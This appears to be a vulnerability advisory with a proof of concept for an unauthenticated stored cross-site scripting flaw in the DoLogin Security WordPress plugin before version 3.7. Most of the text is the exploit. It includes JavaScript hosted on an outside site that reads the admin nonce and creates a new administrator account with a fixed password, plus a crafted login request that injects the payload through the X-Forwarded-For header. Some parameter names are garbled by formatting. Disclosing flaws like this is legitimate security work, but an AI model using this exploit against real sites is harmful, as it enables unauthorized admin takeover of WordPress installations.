DoLogin Security < 3.7 - Unauthenticated Stored Cross-Site Scripting

Description The plugin does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress’ login form.

PoC

1. Put javascript payload on html.cafe. const url = ‘https://s…t/wp-admin/user-new.php’; fetch(url) .then(response => response.text()) .then(html => { const parser = new DOMParser(); const doc = parser.parseFromString(html, ‘text/html’); const nonceValue = doc.getElementById(‘_wpnonce_create-user’).value; const requestOptions = { method: ‘POST’, headers: { ‘Content-Type’: ‘application/x-www-form-urlencoded’ }, body: action=createuser&_wpnonce_create-user=${encodeURIComponent( nonceValue )}&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user;_login=administrator&email;[email protected]&first;_name=&last;_name=&url;=&pass1;=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&pass2;=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&send;_user_notification=0&role;=administrator&ure;_other_roles=&createuser;=Add+New+User }; return fetch(url, requestOptions); }); 2. Send HTTP login request with specially crafted X-Forwarded-For header. POST /wp-login.php HTTP/2 Host: Cookie: wordpress_test_cookie=WP%20Cookie%20check Content-Length: 106 Cache-Control: max-age=0 Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: “” Upgrade-Insecure-Requests: 1 Origin: https:// Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https:///wp-login.php Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 X-Forwarded-For: log=XSSor&pwd;=abcd&wp-submit;=Log+In&redirect;_to=https%3A%2F%2F%2Fwp-admin%2F&testcookie;=1